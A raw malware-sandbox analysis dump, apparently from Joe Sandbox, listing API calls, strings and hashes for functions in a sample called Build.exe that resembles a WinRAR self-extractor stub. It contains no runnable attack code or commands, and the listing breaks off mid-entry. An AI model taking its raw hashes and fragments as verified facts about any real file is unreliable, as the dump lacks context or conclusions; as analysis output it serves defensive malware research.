GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B5C737
GlobalFree.KERNEL32(00000000), ref: 00B5C75D

Strings

PNG, xrefs: 00B5C656

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
String ID: PNG
API String ID: 541704414-364855578
Opcode ID: 3e8fb285e5a4aab97092589e90502cdb4438cba5133e9633624742ba3b654c0c
Instruction ID: cbb010c4a543ee8b4c0be57371e3409788b522650f6bdee2a0aea5c376b10e24
Opcode Fuzzy Hash: 3e8fb285e5a4aab97092589e90502cdb4438cba5133e9633624742ba3b654c0c
Instruction Fuzzy Hash: B7313A71600B02AFD7109F61EC88E1B7FE9EF49752B0405A9F91993661EF21DC89DFA0

Function 00B4F963 Relevance: 16.4, APIs: 3, Strings: 6, Instructions: 684COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000800,CEEE5757), ref: 00B4F9CD

Part of subcall function 00B4E208: _wcslen.LIBCMT ref: 00B4E210

Part of subcall function 00B52663: _wcslen.LIBCMT ref: 00B52669

Part of subcall function 00B53D10: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,CEEE5757,?,?,CEEE5757,00000001,00B4DA04,00000000,CEEE5757,?,0002043C,?,?), ref: 00B53D2C

_wcslen.LIBCMT ref: 00B4FD00
__fprintf_l.LIBCMT ref: 00B4FE50

Strings

RTL, xrefs: 00B4FE12
*messages***, xrefs: 00B4FAD1
*messages***, xrefs: 00B4FB0A
@%s:, xrefs: 00B4FE3A, 00B4FE46
$%s:, xrefs: 00B4FE33
,, xrefs: 00B4FE8B

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: _wcslen$ByteCharFileModuleMultiNameWide__fprintf_l
String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
API String ID: 2646189078-285229759
Opcode ID: 15d205a9c1ffc8b4dded0c8fe25326dada0c391e6d86dec9523cd72e982908c6
Instruction ID: 269b4fe714e0dbf434f946d3900ffa54b007a1032c7c8341e3d1943f80d6823b
Opcode Fuzzy Hash: 15d205a9c1ffc8b4dded0c8fe25326dada0c391e6d86dec9523cd72e982908c6
Instruction Fuzzy Hash: 1342057190065AABDF24EFA8C841BFE73F4FF14700F1445AAFA05AB281EB719A45CB54

Function 00B4C4A8 Relevance: 7.6, APIs: 5, Instructions: 111
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,00B4C39F,000000FF,?,?,?,?,00B487BC,?,?,00000000), ref: 00B4C4E6

Part of subcall function 00B4DA1E: _wcslen.LIBCMT ref: 00B4DA59

FindFirstFileW.KERNELBASE(?,00000000,?,?,00000800,?,?,00B4C39F,000000FF,?,?,?,?,00B487BC,?,?), ref: 00B4C516
GetLastError.KERNEL32(?,?,00000800,?,?,00B4C39F,000000FF,?,?,?,?,00B487BC,?,?,00000000,0000003A), ref: 00B4C522
FindNextFileW.KERNEL32(?,?,00000000,?,?,?,00B4C39F,000000FF,?,?,?,?,00B487BC,?,?,00000000), ref: 00B4C549
GetLastError.KERNEL32(?,?,00B4C39F,000000FF,?,?,?,?,00B487BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 00B4C555

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: 73e814c69d40bf32b25509fdc461b21522835a068249c485c6e6a2a29774741e
Instruction ID: b045a7bfc0b154d30eed845b94827a115dc24788388e0588be66f85351a05e44
Opcode Fuzzy Hash: 73e814c69d40bf32b25509fdc461b21522835a068249c485c6e6a2a29774741e
Instruction Fuzzy Hash: A74184B15086459FC714DF24C8C1AEEF7E8FB58740F00095EF59AD3240DB34AA58DB91

Function 00B6A640 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00B6A616,?,00B7F7B0,0000000C,00B6A76D,?,00000002,00000000), ref: 00B6A661
TerminateProcess.KERNEL32(00000000,?,00B6A616,?,00B7F7B0,0000000C,00B6A76D,?,00000002,00000000), ref: 00B6A668
ExitProcess.KERNEL32 ref: 00B6A67A

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5be0744502ba146f1f66653eefef0d54ab4a9f9d8dc9abc28b12679d5f26e030
Instruction ID: 7e590bde2dcd2b888525e9b915298cca780fd219cac4585ae490b84302dc20a8
Opcode Fuzzy Hash: 5be0744502ba146f1f66653eefef0d54ab4a9f9d8dc9abc28b12679d5f26e030
Instruction Fuzzy Hash: 75E0B631440608AFCF116F64DD49A583BAAEB42741F445464F809AB132DF3AED82CE95

Function 00B5DAE0 Relevance: 97.0, APIs: 47, Strings: 8, Instructions: 750windowfilesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00B41366: GetDlgItem.USER32(00000000,00003021), ref: 00B413AA
Part of subcall function 00B41366: SetWindowTextW.USER32(00000000,00B765F4), ref: 00B413C0

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B5DC06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B5DC24
IsDialogMessageW.USER32(?,?), ref: 00B5DC37
TranslateMessage.USER32(?), ref: 00B5DC45
DispatchMessageW.USER32(?), ref: 00B5DC4F
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00B5DC72
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00B5DC95
GetDlgItem.USER32(?,00000068), ref: 00B5DCB8
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B5DCD3
SendMessageW.USER32(00000000,000000C2,00000000,00B765F4), ref: 00B5DCE6

Part of subcall function 00B5F77B: _wcslen.LIBCMT ref: 00B5F7A5

SetFocus.USER32(00000000), ref: 00B5DCED
_swprintf.LIBCMT ref: 00B5DD4C

Part of subcall function 00B44C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B44C13

GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 00B5DDAF
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 00B5DDD7
GetTickCount.KERNEL32 ref: 00B5DDF5
_swprintf.LIBCMT ref: 00B5DE0D
GetLastError.KERNEL32(?,00000011), ref: 00B5DE3F
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,00000000,00000000,00000000,?,00000800), ref: 00B5DE92
_swprintf.LIBCMT ref: 00B5DEC9
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp,?,?,?,?,00B93482,00000200), ref: 00B5DF1D
GetCommandLineW.KERNEL32(?,?,?,?,00B93482,00000200), ref: 00B5DF33
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00B93482,00000400,00000001,00000001,?,?,?,?,00B93482,00000200), ref: 00B5DF8A
ShellExecuteExW.SHELL32(?), ref: 00B5DFB2
Sleep.KERNEL32(00000064,?,?,?,?,00B93482,00000200), ref: 00B5DFFA
UnmapViewOfFile.KERNEL32(?,?,0000421C,00B93482,00000400,?,?,?,?,00B93482,00000200), ref: 00B5E023
CloseHandle.KERNEL32(?,?,?,?,?,00B93482,00000200), ref: 00B5E02C
_swprintf.LIBCMT ref: 00B5E05F
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B5E0BE
SetDlgItemTextW.USER32(?,00000065,00B765F4), ref: 00B5E0D5
GetDlgItem.USER32(?,00000065), ref: 00B5E0DE
GetWindowLongW.USER32(00000000,000000F0), ref: 00B5E0ED
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B5E0FC
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B5E1A9
_wcslen.LIBCMT ref: 00B5E1FF
_swprintf.LIBCMT ref: 00B5E229
SendMessageW.USER32(?,00000080,00000001,0003046F), ref: 00B5E273
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00B5E28D
GetDlgItem.USER32(?,00000068), ref: 00B5E296
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00B5E2AC
GetDlgItem.USER32(?,00000066), ref: 00B5E2C6
SetWindowTextW.USER32(00000000,00B9589A), ref: 00B5E2E8
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00B5E348
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B5E35B
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001D8C0,00000000,?), ref: 00B5E3FE
EnableWindow.USER32(00000000,00000000), ref: 00B5E4CC
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00B5E50E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B5E532

Strings

__tmp_rar_sfx_access_check_%u, xrefs: 00B5DDFC
-el -s2 "-d%s" "-sp%s", xrefs: 00B5DEB8
"%s"%s, xrefs: 00B5E04E
C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe, xrefs: 00B5E11E, 00B5E2FE
%s, xrefs: 00B5E219
winrarsfxmappingfile.tmp, xrefs: 00B5DEF3
STARTDLG, xrefs: 00B5DB2D
LICENSEDLG, xrefs: 00B5E3F3

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Item$MessageText$Send$Window_swprintf$File$ErrorLast$DialogLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3247240745-555893226
Opcode ID: 5c69d3f0cba97304f660b4f60df9f35c1860f0a66ea6fafb72bc4758ef70a199
Instruction ID: 15c2274a80506c16972c60dbcd7493614f64ced9cc47de31afb2f32b4b2cfd46
Opcode Fuzzy Hash: 5c69d3f0cba97304f660b4f60df9f35c1860f0a66ea6fafb72bc4758ef70a199
Instruction Fuzzy Hash: 5642C471944344AAEB35AB60DC8AFBE3BE8EB06B02F0445D5F914A71E1DF745B48CB21

Function 00B5290A Relevance: 54.6, APIs: 23, Strings: 8, Instructions: 327
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00B52937
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B52949
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B52973
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B52C1D
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B52C37
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B52C4B
ReadFile.KERNEL32(00000000,?,00007FFE,00B76F24,00000000), ref: 00B52C69
CloseHandle.KERNEL32(00000000), ref: 00B52CCD
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B52CE6
CompareStringW.KERNEL32(00000400,00001001,00B76F70,?,DXGIDebug.dll,?,00B76F24,?,00000000,?,00000800), ref: 00B52D3A
GetFileAttributesW.KERNELBASE(?,?,00B76F24,00000800,?,00000000,?,00000800), ref: 00B52D64
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00B52DA0

Part of subcall function 00B528AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B528D4
Part of subcall function 00B528AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B51309,Crypt32.dll,00000000,00B51383,00000200,?,00B51366,00000000,00000000,?), ref: 00B528F4

_swprintf.LIBCMT ref: 00B52E12
_swprintf.LIBCMT ref: 00B52E5E
AllocConsole.KERNEL32 ref: 00B52E66
GetCurrentProcessId.KERNEL32 ref: 00B52E70
AttachConsole.KERNEL32(00000000), ref: 00B52E77
_wcslen.LIBCMT ref: 00B52E8C
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00B52E9D
WriteConsoleW.KERNEL32(00000000), ref: 00B52EA4
Sleep.KERNEL32(00002710), ref: 00B52EAF
FreeConsole.KERNEL32 ref: 00B52EB5
ExitProcess.KERNEL32 ref: 00B52EBD

Strings

uxtheme.dll, xrefs: 00B52DDF
dwmapi.dll, xrefs: 00B529D9, 00B52DD5
<, xrefs: 00B52D3A
SetDllDirectoryW, xrefs: 00B52943
kernel32, xrefs: 00B5292D
DXGIDebug.dll, xrefs: 00B529AE, 00B52D26
SetDefaultDllDirectories, xrefs: 00B5296D
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00B52E4C

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite_wcslen
String ID: <$DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 270162209-1156125387
Opcode ID: 709a3fe69fd6f7be9e71492eba2bc30f9f3bee81b15269e70be6aecb52e61de7
Instruction ID: d4a19e77f27f09737857ff46ba67f51b56d5f1e3a52fbbc42d21d298febec86a
Opcode Fuzzy Hash: 709a3fe69fd6f7be9e71492eba2bc30f9f3bee81b15269e70be6aecb52e61de7
Instruction Fuzzy Hash: E8D171B20497849FD7309F50D888B9FBBE8EB85305F50899DF5AD9B251CFB08548CB62

Function 00B5F7FC Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B5D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B5D875
Part of subcall function 00B5D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B5D886
Part of subcall function 00B5D864: IsDialogMessageW.USER32(0002043C,?), ref: 00B5D89A
Part of subcall function 00B5D864: TranslateMessage.USER32(?), ref: 00B5D8A8
Part of subcall function 00B5D864: DispatchMessageW.USER32(?), ref: 00B5D8B2

GetDlgItem.USER32(00000068,00BA3CF0), ref: 00B5F81F
ShowWindow.USER32(00000000,00000005,?,?,00B5D099,00000001,?,?,00B5DAB9,00B782F0,00BA3CF0,00BA3CF0,00001000,00B850C4,00000000,?), ref: 00B5F844
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B5F853
SendMessageW.USER32(00000000,000000C2,00000000,00B765F4), ref: 00B5F861
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B5F87B
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B5F895
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B5F8D9
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B5F8E4
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B5F8F7
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B5F91E
SendMessageW.USER32(00000000,000000C2,00000000,00B7769C), ref: 00B5F92D

Strings

\, xrefs: 00B5F885

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 879c629f60e4213a317e67fc3d76487d6e96ac2417be6fc73b444daa4ff627f0
Instruction ID: 45fb41dc3a577d8b4824f7b0eab87719401fc55ea6d0a66b893da8586006eb71
Opcode Fuzzy Hash: 879c629f60e4213a317e67fc3d76487d6e96ac2417be6fc73b444daa4ff627f0
Instruction Fuzzy Hash: A631D2B1289704AFE310DF24DC46F6B7BE8EB46704F04095EF5A1AB2A1CF6059088B66

Function 00B5FAFC Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00B5FB35
ShellExecuteExW.SHELL32(?), ref: 00B5FC78
ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00B5FCB0
GetExitCodeProcess.KERNEL32(?,?), ref: 00B5FCEC
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00B5FD12
ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00B5FD78

Strings

.exe, xrefs: 00B5FD1C
.inf, xrefs: 00B5FC34

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 1b0f163b33e826e235af082e296a1a2402eb4bb53820bdfda2e6b0f7398737d5
Instruction ID: 25c7b40d03ff6715f266e5fc1c0cc58551e45668def5f638819901a9169ab724
Opcode Fuzzy Hash: 1b0f163b33e826e235af082e296a1a2402eb4bb53820bdfda2e6b0f7398737d5
Instruction Fuzzy Hash: 8B61C0315083869ADB309F60D841BBBFBE4EB85745F0448FEFDC497291EB7099898B52

Function 00B6CFAB Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B67F99,00B67F99,?,?,?,00B6D1FC,00000001,00000001,62E85006), ref: 00B6D005
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B6D1FC,00000001,00000001,62E85006,?,?,?), ref: 00B6D08B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B6D185
__freea.LIBCMT ref: 00B6D192

Part of subcall function 00B6BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B66A24,?,0000015D,?,?,?,?,00B67F00,000000FF,00000000,?,?), ref: 00B6BCC0

__freea.LIBCMT ref: 00B6D19B
__freea.LIBCMT ref: 00B6D1C0

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 5d852902262da769ee81947d6a542c8ac9e167768ca4c93f5e95e205dc89ef7f
Instruction ID: 5aed5f5ae83170a6f53bd6e7af31f17f4f2de6eb057411e832813b2213661cfe
Opcode Fuzzy Hash: 5d852902262da769ee81947d6a542c8ac9e167768ca4c93f5e95e205dc89ef7f
Instruction Fuzzy Hash: 6451C072B00216ABDB258F64CC81FBB77EAEB45710F1546A8FD19EA140DB78DC80C690

Function 00B5CCD9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B528AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B528D4
Part of subcall function 00B528AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B51309,Crypt32.dll,00000000,00B51383,00000200,?,00B51366,00000000,00000000,?), ref: 00B528F4

OleInitialize.OLE32(00000000), ref: 00B5CCF2
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B5CD29
SHGetMalloc.SHELL32(00B8C460), ref: 00B5CD33

Strings

riched20.dll, xrefs: 00B5CCE1
3To, xrefs: 00B5CD0A

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3To
API String ID: 3498096277-2168385784
Opcode ID: a07c5829acc72e2c3eb77ff61bbb895dba290f2f664fa2ae989c2be74b423207
Instruction ID: 15059de5d28a6cdbc184e3f0943822e51b0b0682493178e31fc030e4e407a11d
Opcode Fuzzy Hash: a07c5829acc72e2c3eb77ff61bbb895dba290f2f664fa2ae989c2be74b423207
Instruction Fuzzy Hash: 40F049B1D44209ABDB20AF99DC499EFFFFCEF81700F00409AE811A2251CBB846458BA0

Function 00B512F6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

